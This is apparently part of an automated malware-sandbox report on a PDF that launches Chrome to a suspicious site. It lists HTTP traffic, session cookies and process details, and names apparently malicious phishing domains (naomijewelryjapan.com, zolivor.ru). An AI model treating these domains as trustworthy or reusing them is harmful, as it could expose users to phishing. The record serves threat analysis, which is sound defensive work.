                                                                                        Cookie: XSRF-TOKEN=eyJpdiI6Im1CM3pYYVNmRXRjQnJOWk1Ia3lYZkE9PSIsInZhbHVlIjoiNmJpQXpmRmM1RzB1M0hkTzJKUHhYaTJ0RkRpblM4WGZ3eUFSQ3JNckgvWjJvRjdOWHUrRDdhYzB3UUtUaEk1ZkRXRUpjcUgvR3dsdHFaNm9vRHYxR292Um9aT3JZd2txRFErS0xCTDlaNVVKbm5TeXR1SEVPaGVRVkJSeGlFNFoiLCJtYWMiOiIxMGU4NWExMzhhMjc4ZjdlYjg1MTg4NWNjNDc4ZGQ4ZjI1ZDUyZWVjNDdmYWYyYzYwYzRhMTQzY2RkMzIzOTE4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Inl0MXdpNDhPdlhMR3lsQmk0eXhUelE9PSIsInZhbHVlIjoiUHZ2YXhiUTc2TU42c3M0YktZcG5UbzJIdWVsTC9oaWYrQmNsR3Vod2ZRcmpXeEdRK1FjN3FCd1N0QUZyQjRGanYyNU4zdGZlTEYraE8zUzlBSzVZVG1oVjlzYzl3eEhuTGVjS2ZsZjdGS0JYVTlnV3hHQ0RtTUFicUZXejV3M0MiLCJtYWMiOiJhODIwZjFkNDNmNjhlOGJjZTRiYTIxYzFiNzFiZjZlYzgwYWJlYmYxNGI5M2U2OTZjNDIyMzE1MTE3MDUyMWUxIiwidGFnIjoiIn0%3D
                                                                                        2024-12-24 08:20:10 UTC1078INHTTP/1.1 404 Not Found
                                                                                        Date: Tue, 24 Dec 2024 08:20:10 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=14400
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uIVv040PwPep6UsZ77yq0Gpisrq2Md6QC%2BNHamYjY1r67rQcC%2BJG3ketZmlH6tatsRHXOnRdZXMiGaMiNOBuGT%2B1RO562TfBQ0dC%2FnvlilupHTkVw9IcKyAvPRmM2Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Vary: Accept-Encoding
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1058&min_rtt=934&rtt_var=73&sent=173&recv=92&lost=0&retrans=0&sent_bytes=152504&recv_bytes=9481&delivery_rate=23260476&cwnd=257&unsent_bytes=0&cid=5728de065a65d76d&ts=991203&x=0"
                                                                                        CF-Cache-Status: HIT
                                                                                        Age: 12078
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f6f2badb837424b-EWR
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1552&min_rtt=1546&rtt_var=593&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1890&delivery_rate=1823860&cwnd=248&unsent_bytes=0&cid=d412bb2ff8c26f7f&ts=4324&x=0"
                                                                                        2024-12-24 08:20:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        24192.168.2.450062151.101.2.1374434588C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 08:20:11 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                        Host: code.jquery.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-24 08:20:12 UTC612INHTTP/1.1 200 OK
                                                                                        Connection: close
                                                                                        Content-Length: 89501
                                                                                        Server: nginx
                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                        Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                        ETag: "28feccc0-15d9d"
                                                                                        Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                        Accept-Ranges: bytes
                                                                                        Date: Tue, 24 Dec 2024 08:20:11 GMT
                                                                                        Age: 512938
                                                                                        X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740065-EWR
                                                                                        X-Cache: HIT, HIT
                                                                                        X-Cache-Hits: 2774, 1
                                                                                        X-Timer: S1735028412.901584,VS0,VE3
                                                                                        Vary: Accept-Encoding
                                                                                        2024-12-24 08:20:12 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                        Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                        2024-12-24 08:20:12 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                                        Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                                        2024-12-24 08:20:12 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                                        Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                                        2024-12-24 08:20:12 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                                        Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                                        2024-12-24 08:20:12 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                                        Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                                        2024-12-24 08:20:12 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                                        Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        25192.168.2.45006635.190.80.14434588C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 08:20:12 UTC535OUTOPTIONS /report/v4?s=uIVv040PwPep6UsZ77yq0Gpisrq2Md6QC%2BNHamYjY1r67rQcC%2BJG3ketZmlH6tatsRHXOnRdZXMiGaMiNOBuGT%2B1RO562TfBQ0dC%2FnvlilupHTkVw9IcKyAvPRmM2Q%3D%3D HTTP/1.1
                                                                                        Host: a.nel.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Origin: https://e84.zolivor.ru
                                                                                        Access-Control-Request-Method: POST
                                                                                        Access-Control-Request-Headers: content-type
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-24 08:20:12 UTC336INHTTP/1.1 200 OK
                                                                                        Content-Length: 0
                                                                                        access-control-max-age: 86400
                                                                                        access-control-allow-methods: POST, OPTIONS
                                                                                        access-control-allow-origin: *
                                                                                        access-control-allow-headers: content-type, content-length
                                                                                        date: Tue, 24 Dec 2024 08:20:11 GMT
                                                                                        Via: 1.1 google
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        26192.168.2.45006735.190.80.14434588C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 08:20:13 UTC478OUTPOST /report/v4?s=uIVv040PwPep6UsZ77yq0Gpisrq2Md6QC%2BNHamYjY1r67rQcC%2BJG3ketZmlH6tatsRHXOnRdZXMiGaMiNOBuGT%2B1RO562TfBQ0dC%2FnvlilupHTkVw9IcKyAvPRmM2Q%3D%3D HTTP/1.1
                                                                                        Host: a.nel.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 422
                                                                                        Content-Type: application/reports+json
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-24 08:20:13 UTC422OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 33 30 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 65 38 34 2e 7a 6f 6c 69 76 6f 72 2e 72 75 2f 4f 53 6b 6c 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 31 31 32 2e 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c
                                                                                        Data Ascii: [{"age":0,"body":{"elapsed_time":330,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://e84.zolivor.ru/OSkl/","sampling_fraction":1.0,"server_ip":"104.21.112.1","status_code":404,"type":"http.error"},"type":"network-error","url
                                                                                        2024-12-24 08:20:14 UTC168INHTTP/1.1 200 OK
                                                                                        Content-Length: 0
                                                                                        date: Tue, 24 Dec 2024 08:20:13 GMT
                                                                                        Via: 1.1 google
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Click to jump to process

                                                                                        Click to jump to process

                                                                                        Click to dive into process behavior distribution

                                                                                        Click to jump to process

                                                                                        Target ID:0
                                                                                        Start time:03:17:13
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\eCompleted_419z.pdf"
                                                                                        Imagebase:0x7ff6bc1b0000
                                                                                        File size:5'641'176 bytes
                                                                                        MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:1
                                                                                        Start time:03:17:17
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                        Imagebase:0x7ff74bb60000
                                                                                        File size:3'581'912 bytes
                                                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:3
                                                                                        Start time:03:17:21
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1480,i,3501403854715251483,1322142389642693983,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                        Imagebase:0x7ff74bb60000
                                                                                        File size:3'581'912 bytes
                                                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:9
                                                                                        Start time:03:17:38
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://5m9sp7.naomijewelryjapan.com/"
                                                                                        Imagebase:0x7ff76e190000
                                                                                        File size:3'242'272 bytes
                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:10
                                                                                        Start time:03:17:39
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2424 --field-trial-handle=2392,i,16451973532312144551,1979798678558124622,262144 /prefetch:8
                                                                                        Imagebase:0x7ff76e190000
                                                                                        File size:3'242'272 bytes
                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        No disassembly